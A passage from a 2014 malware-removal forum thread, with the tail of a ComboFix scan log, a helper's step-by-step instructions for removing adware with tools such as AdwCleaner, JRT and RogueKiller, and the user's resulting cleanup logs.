S3 TMachInfo;TMachInfo;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe;c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [x]
S3 TOSHIBA HDD SSD Alert Service;TOSHIBA HDD SSD Alert Service;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe;c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [x]
S3 TPCHSrv;TPCH Service;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe;c:\program files\TOSHIBA\TPHM\TPCHSrv.exe [x]
S3 wdkmd;Intel WiDi KMD;c:\windows\system32\DRIVERS\WDKMD.sys;c:\windows\SYSNATIVE\DRIVERS\WDKMD.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ    hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-11-27 12:36 1087304 ----a-w- c:\program files (x86)\Google\Chrome\Application\39.0.2171.71\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-12-03 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-17 17:22]
.
2014-12-03 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-05-18 01:22]
.
2014-12-03 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2011-05-18 01:22]
.
2014-12-03 c:\windows\Tasks\ReclaimerUpdateFiles_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
2014-12-03 c:\windows\Tasks\ReclaimerUpdateXML_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
2014-12-03 c:\windows\Tasks\RNUpgradeHelperLogonPrompt_Owner.job
- c:\users\Owner\AppData\Roaming\Real\Update\UpgradeHelper\RealPlayer\11.03\agent\rnupgagent.exe [2014-11-22 00:33]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ThpSrv"="c:\windows\system32\thpsrv" [X]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2011-04-08 167256]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2011-04-08 391000]
"Persistence"="c:\windows\system32\igfxpers.exe" [2011-04-08 418136]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2011-01-18 2188904]
"IntelWireless"="c:\program files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" [2011-01-05 1933584]
"IntelWirelessWiMAX"="c:\program files\Intel\WiMAX\Bin\WiMAXCU.exe" [2011-03-02 1617920]
"TosSENotify"="c:\program files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe" [2010-12-08 710040]
"TosVolRegulator"="c:\program files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe" [2009-11-11 24376]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = <local>
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~2\MICROS~1\Office14\ONBttnIE.dll/105
Trusted Zone: avast.com\public
Trusted Zone: bleepingcomputer.com\www
Trusted Zone: freeinstallfree.com\e0e57e9dbf80077061a89b8f58d2e6c8
Trusted Zone: freeinstallfree.com\static
Trusted Zone: intuit.com\ttlc
Trusted Zone: jefferson-bank.com\www
Trusted Zone: startpagea.com\cdn
Trusted Zone: viglink.com\api
Trusted Zone: whatthetech.com\forums
TCP: DhcpNameServer = 192.168.0.1 205.171.203.226
TCP: Interfaces\{C26C072B-4739-4C0D-B7F1-F4190F08DC70}: NameServer = 0.0.0.0
DPF: Garmin Communicator Plug-In - hxxps://static.garmincdn.com/gcp/ie/4.0.4.0/GarminAxControl_32.CAB
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-TSleepSrv - %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
Wow6432Node-HKLM-Run-HP Update 4300C - c:\sj657\hpupdate.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
Toolbar-Locked - (no file)
HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe
HKLM-Run-TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe
HKLM-Run-Teco - c:\program files (x86)\TOSHIBA\TECO\Teco.exe
HKLM-Run-TosWaitSrv - c:\program files (x86)\TOSHIBA\TPHM\TosWaitSrv.exe
HKLM-Run-TosNC - c:\program files (x86)\Toshiba\BulletinBoard\TosNcCore.exe
HKLM-Run-TosReelTimeMonitor - c:\program files (x86)\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
AddRemove-UpdaterEX - c:\users\Owner\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe
.
.
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\services\N360]
"ImagePath"="\"c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe\" /s \"N360\" /m \"c:\program files (x86)\Norton 360\Engine\21.6.0.32\diMaster.dll\" /prefetch:1"
"ImagePath"="\SystemRoot\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS"
"TrustedImagePaths"="c:\program files (x86)\Norton 360\Engine\21.6.0.32;c:\program files (x86)\Norton 360\Engine64\21.6.0.32"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_239_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\windows\\system32\\Macromed\\Flash\\FlashUtil64_15_0_0_239_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_239_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_15_0_0_239_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.15"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\windows\\SysWOW64\\Macromed\\Flash\\Flash32_15_0_0_239.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-12-02  21:39:44
ComboFix-quarantined-files.txt  2014-12-03 03:39
.
Pre-Run: 508,067,086,336 bytes free
Post-Run: 506,822,668,288 bytes free
.
- - End Of File - - 49B9D2876BDBD5958BEECCC4300AF9CA
 


    Advertisements

Register to Remove


#11 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 10:05 PM

TDSKiller has been run.  The first log looks like it was a false start because I got the request to reboot.  The log that is attached is the 2nd log, the one that looks like the actual scan.  If you need the 1st log, let me know and I will attach it as well.



#12 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 10:09 PM

Attached File  TDSSKiller.3.0.0.41_02.12.2014_21.53.09_log.txt   796.96KB   92 downloads



#13 LiquidTension

LiquidTension

    SuperMember

  • Retired Classroom Teacher
  • 2,566 posts

Posted 03 December 2014 - 12:22 AM

Hi Sue, 
 

It looks like after it completed, all the way this time, it removed the fixlist.txt that had been on my desktop.

That's OK. The fix ran successfully, and removed the main infection present. 
 
Please work your way through the following steps. 
 
STEP 1
EtQetiM.png Uninstall Software

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for the following programmes, right-click and click Uninstall.
  • Note: Ensure you decline offers of additional software if applicable.
    • Extended Update
    • Yahoo! Toolbar
  • Follow the prompts.
  • Reboot if necessary.
     

STEP 2
BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean
  • Follow the prompts and allow your computer to reboot
  • After rebooting, a log (AdwCleaner[S0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for anything removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 

STEP 3
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 4
mlEX1wH.png RogueKiller

  • Please download RogueKiller (x64) and save the file to your Desktop.
  • Close any running programmes.
  • Right-Click RogueKiller.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Allow the Prescan to complete. Upon completion, a window will open. Click Accept.
  • A browser window may open. Close the browser window.
  • Click jpgUwzp.png. Upon completion, click phPvmc6.png.
  • Close the programme. Do not fix anything!
  • A log (RKreport.txt) will be open. Copy the contents of the log and paste in your next reply.
     

======================================================

STEP 5
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Did the programme uninstall OK?
  • AdwCleaner[S0].txt
  • JRT.txt
  • RKreport.txt

50QfLth.png

 

Would you like to help others with malware removal? Join our Classroom and learn how!


#14 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 04 December 2014 - 04:35 PM

Log after running ADWareClean

# AdwCleaner v4.103 - Report created 04/12/2014 at 16:24:23
# Updated 01/12/2014 by Xplode
# Database : 2014-12-03.1 [Live]
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Owner - OWNER-PC
# Running from : C:\Users\Owner\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Tarma Installer
Folder Deleted : C:\ProgramData\PC Drivers HeadQuarters
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Detective
Folder Deleted : C:\Program Files (x86)\PC Drivers HeadQuarters
Folder Deleted : C:\Users\Owner\AppData\Local\PackageAware
Folder Deleted : C:\Users\Owner\AppData\LocalLow\HPAppData
Folder Deleted : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
File Deleted : C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.wajam.com_0.localstorage

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Deleted : [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Key Deleted : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{EA28B360-05E0-4F93-8150-02891F1D8D3C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\UpdaterEX
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4640FDE1-B83A-4376-84ED-86F86BEE2D41}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v

-\\ Google Chrome v39.0.2171.71

[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
[C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=sb&qsrc=2869

*************************

AdwCleaner[R0].txt - [3182 octets] - [04/12/2014 16:20:45]
AdwCleaner[S0].txt - [3106 octets] - [04/12/2014 16:24:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3166 octets] ##########



#15 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 04 December 2014 - 04:47 PM

JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.0 (11.29.2014:1)
OS: Windows 7 Home Premium x64
Ran by Owner on Thu 12/04/2014 at 16:39:42.90
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

 

~~~ Registry Keys

 

~~~ Files

Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARMANAGER_8CA8B414-8A88BD82.pf
Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARNOTIFIER.EXE-7AE0A20E.pf
Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARUSER_32.EXE-34B1B1C5.pf

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\best buy pc app"
Successfully deleted: [Folder] "C:\Users\Owner\appdata\local\best buy pc app"
Successfully deleted: [Folder] "C:\Users\Owner\appdata\local\pc_drivers_headquarters"
Successfully deleted: [Folder] "C:\Program Files (x86)\bucksbee loyalty plugin - 100815"
Successfully deleted: [Folder] "C:\ai_recyclebin"
Successfully deleted: [Folder] "C:\windows\syswow64\ai_recyclebin"
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{072DE87B-4B6A-40D4-8F80-0A5ACEFE4EC1}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{180D8750-2D20-4239-8FD7-7CE61016AE48}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{1D96466C-D2F1-495F-8FE7-0DF844A41DAA}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{2E8064C7-A5F8-4B0C-993C-B3E74D2851B9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{44FD7CB8-60E3-448C-BC25-16174ADD6C6C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{4BC8E832-E487-46A2-92B8-206E5F92AB3E}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{4D76B10B-19A5-4197-A1B0-2DC946D93C74}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{5F9AD202-E89E-44E6-A387-7BF33A95AF18}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{62A10E0F-687A-4AA2-9944-1F9710D33255}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{6D0A89AB-2266-411C-8662-900B1A182001}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{71703D6C-1A64-4D6D-8F27-123E5BC82F0D}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{71C493E7-2286-4120-ABA2-390BF33CC89D}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{75564AB6-AAEE-475D-8547-EB25F2D86BE7}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7A0E19BE-BFCC-4E67-B99E-FD8D51451A53}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7D6FA57C-9F63-4920-A3A3-F4ECDBA6EF7A}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7DF5534A-6355-4A77-B444-D090B5AA9B90}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{80727867-4C0B-46FD-9408-81EB093FD04C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{91C87F94-637F-4D47-B91C-210457E7638B}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{9FA20B5F-D2EF-4655-BC01-9968A8572122}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{B3C976EE-2872-4E39-8291-3AF0D9BCE5F9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{C069F15F-3C8C-4728-B7EA-C8338F21A72C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{C64B2AE7-0719-4361-B083-555BE5F846D9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{D108C202-4C3C-44FF-AF57-83942FF38968}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{E479ED41-26FF-4662-A1EC-9A0DB523F824}

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 12/04/2014 at 16:43:34.71
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Related Topics



0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users